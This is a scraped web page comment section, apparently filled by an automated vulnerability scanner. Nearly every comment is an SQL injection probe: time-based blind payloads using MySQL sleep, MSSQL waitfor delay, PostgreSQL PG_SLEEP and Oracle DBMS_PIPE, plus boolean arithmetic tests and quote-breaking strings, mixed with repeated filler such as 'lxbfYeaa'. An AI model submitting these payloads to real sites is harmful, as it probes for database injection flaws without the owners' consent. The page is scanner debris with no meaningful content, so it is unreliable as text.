23/02/2022, 12:48:34 AM, www.vulnweb.com
Reply

e

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z:
23/02/2022, 12:48:49 AM, www.vulnweb.com
Reply

e

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z:
23/02/2022, 12:49:02 AM, www.vulnweb.com
Reply

e

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/:
23/02/2022, 12:49:16 AM, www.vulnweb.com
Reply

e

1 waitfor delay '0:0:15' --:
23/02/2022, 12:49:29 AM, www.vulnweb.com
Reply

e

TFZKHMCl'; waitfor delay '0:0:15' --:
23/02/2022, 12:49:42 AM, www.vulnweb.com
Reply

e

qlyKJ2cu' OR 375=(SELECT 375 FROM PG_SLEEP(15))--:
23/02/2022, 12:49:56 AM, www.vulnweb.com
Reply

e

XrZ9ZIpG') OR 360=(SELECT 360 FROM PG_SLEEP(15))--:
23/02/2022, 12:50:09 AM, www.vulnweb.com
Reply

e

SoVP5G8T')) OR 621=(SELECT 621 FROM PG_SLEEP(15))--:
23/02/2022, 12:50:21 AM, www.vulnweb.com
Reply

e

lxbfYeaa'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||':
23/02/2022, 12:50:34 AM, www.vulnweb.com
Reply

e

1'":
23/02/2022, 12:50:35 AM, www.vulnweb.com
Reply

e

@@rJAC3:
23/02/2022, 12:50:36 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:50:50 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:51:04 AM, www.vulnweb.com
Reply

e

lxbfYeaa:
23/02/2022, 12:51:06 AM, -1 OR 2+949-949-1=0+0+0+1 --
Reply

e

lxbfYeaa:
23/02/2022, 12:51:07 AM, -1 OR 3+949-949-1=0+0+0+1 --
Reply

e

lxbfYeaa:
23/02/2022, 12:51:08 AM, -1 OR 2+783-783-1=0+0+0+1
Reply

e

lxbfYeaa:
23/02/2022, 12:51:08 AM, -1 OR 3+783-783-1=0+0+0+1
Reply

e

lxbfYeaa:
23/02/2022, 12:51:09 AM, -1' OR 2+108-108-1=0+0+0+1 --
Reply

e

lxbfYeaa:
23/02/2022, 12:51:11 AM, -1' OR 3+108-108-1=0+0+0+1 --
Reply

e

lxbfYeaa:
Reply

e

lxbfYeaa:
Reply

e

lxbfYeaa:
23/02/2022, 12:51:14 AM, -1" OR 2+628-628-1=0+0+0+1 --
Reply

e

lxbfYeaa:
23/02/2022, 12:51:15 AM, -1" OR 3+628-628-1=0+0+0+1 --
Reply

e

lxbfYeaa:
23/02/2022, 12:51:33 AM, if(now()=sysdate(),sleep(15),0)
Reply

e

lxbfYeaa:
Reply

e

lxbfYeaa:
Reply

e

lxbfYeaa:
23/02/2022, 12:53:04 AM, 1 waitfor delay '0:0:15' --
Reply

e

lxbfYeaa:
23/02/2022, 12:53:33 AM, DAkXRtc9'; waitfor delay '0:0:15' --
Reply

e

lxbfYeaa:
Reply

e

lxbfYeaa:
Reply

e

lxbfYeaa:
23/02/2022, 12:54:30 AM, www.vulnweb.com
Reply

1

lxbfYeaa:
Reply

e

lxbfYeaa:
23/02/2022, 12:54:56 AM, www.vulnweb.com
Reply

1

lxbfYeaa:
23/02/2022, 12:55:17 AM, 1'"
Reply

e

lxbfYeaa:
23/02/2022, 12:55:18 AM
Reply

e

lxbfYeaa:
23/02/2022, 12:55:18 AM, www.vulnweb.com
Reply

1

lxbfYeaa:
23/02/2022, 12:55:19 AM, @@XR6xz
Reply

e

lxbfYeaa:
23/02/2022, 12:55:45 AM, www.vulnweb.com
Reply

1

lxbfYeaa:
23/02/2022, 12:57:29 AM, www.vulnweb.com
Reply

1

lxbfYeaa:
23/02/2022, 12:58:39 AM, www.vulnweb.com
Reply

1

lxbfYeaa:
23/02/2022, 12:58:52 AM, www.vulnweb.com
Reply

1

lxbfYeaa:
23/02/2022, 12:59:05 AM, www.vulnweb.com
Reply

1

lxbfYeaa:
23/02/2022, 12:59:33 AM, www.vulnweb.com
Reply

1

lxbfYeaa:
23/02/2022, 12:59:34 AM, www.vulnweb.com
Reply

1

lxbfYeaa:
23/02/2022, 01:22:49 AM, www.vulnweb.com
Reply

e

Leave a Comment